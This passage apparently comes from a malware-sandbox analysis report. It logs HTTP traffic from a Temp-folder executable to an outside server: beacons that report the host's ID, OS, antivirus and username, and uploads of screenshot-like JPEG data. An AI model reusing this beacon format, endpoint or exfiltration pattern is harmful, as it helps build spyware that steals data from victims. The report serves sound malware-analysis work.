                                        Aug 29, 2021 22:28:21.422256947 CEST14747OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:21.422406912 CEST14755OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:28:21.422439098 CEST14760OUTData Raw: b5 1a 90 b5 c9 78 47 14 e5 4e a2 76 3e 52 ef 5e 95 f0 3d 51 fc 79 2a ba ab 29 b1 93 21 86 47 de 4a f3 5a eb 3e 1e 78 a6 d3 c1 fe 24 7d 4e f2 de 69 e2 36 ef 10 48 b1 92 49 5f 52 38 e0 d7 9d 51 37 06 91 ed 53 69 49 36 7a 94 7e 28 bd be f1 84 70 d8
                                        Data Ascii: xGNv>R^=Qy*)!GJZ>x$}Ni6HI_R8Q7SiI6z~(pI-{d\#8$/exjQUUf 8fg4Rfy^8#TZ#Qu]oIV}+mmkEx[II uH {
                                        Aug 29, 2021 22:28:21.454756021 CEST14763OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:28:21.454811096 CEST14776OUTData Raw: b8 d2 ef de 58 82 ee 31 be 57 e6 50 dc 65 c1 e8 47 6a e5 a7 56 a5 57 cb 08 dd 9b d4 a7 4e 92 e6 9c ac 8f 9f bf b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a 3f b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a f7 33 e2 1f 03 8e ba 4e a7 f9 8f fe 39 5b fa 35 9f 85
                                        Data Ascii: X1WPeGjVWN?]??]3N9[5u5&0`G^y")%6cZXeVh9:GktFdmvs0~^H xY3.Y]Z*9WAQE(>o&Q\bdg)z{WU
                                        Aug 29, 2021 22:28:21.454842091 CEST14787OUTData Raw: 51 57 3e c4 68 fb 11 a3 d9 cb b0 bd ac 4a 74 0a b9 f6 16 a5 fb 0b 51 ec a5 d8 3d ac 7b 94 e9 45 5c fb 03 53 85 83 53 54 a4 2f 6b 1e e5 1a 5a b9 f6 16 cd 2f d8 18 d3 f6 52 17 b5 8f 72 9d 1c 55 cf b0 35 2f d8 0d 3f 65 20 f6 b1 ee 52 a0 d5 d1 60 d4
                                        Data Ascii: QW>hJtQ={E\SST/kZ/RrU5/?e R`e!{X(W/qO;)UZQZc.uE_>Q={)xi4Uem}%i4fZ=-j&HOja_X+a>>hz z
                                        Aug 29, 2021 22:28:21.557008028 CEST14829INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:21 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        221192.168.2.44996046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:21.508351088 CEST14828OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:21.585319042 CEST14829INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:21 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        222192.168.2.44996146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:21.845362902 CEST14830OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:21.923960924 CEST14857INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:21 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        223192.168.2.44996246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:21.885750055 CEST14831OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:21.885847092 CEST14831OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:21.886008978 CEST14841OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:21.886147976 CEST14844OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:21.923794985 CEST14849OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:21.923852921 CEST14857OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:21.924537897 CEST14864OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:28:21.924590111 CEST14869OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:21.960707903 CEST14872OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:21.960741997 CEST14875OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:21.960793972 CEST14886OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:22.071844101 CEST14939INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        224192.168.2.44996346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:22.108160019 CEST14940OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:22.188016891 CEST14940INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        225192.168.2.44996446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:22.521174908 CEST14941OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:22.597179890 CEST14980INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        226192.168.2.44996546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:22.558584929 CEST14941OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:22.558686018 CEST14942OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:22.558857918 CEST14952OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:22.559005022 CEST14954OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:22.594022036 CEST14957OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:22.594072104 CEST14960OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:22.594338894 CEST14968OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:22.594523907 CEST14974OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:28:22.594551086 CEST14980OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:22.630825043 CEST14986OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:22.630861998 CEST14991OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:22.743383884 CEST15049INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        227192.168.2.44996646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:22.834120035 CEST15050OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:22.911597967 CEST15050INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        228192.168.2.44996746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:23.203746080 CEST15051OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:23.284012079 CEST15090INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        229192.168.2.44996846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:23.228316069 CEST15052OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:23.228394032 CEST15052OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:23.228563070 CEST15062OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
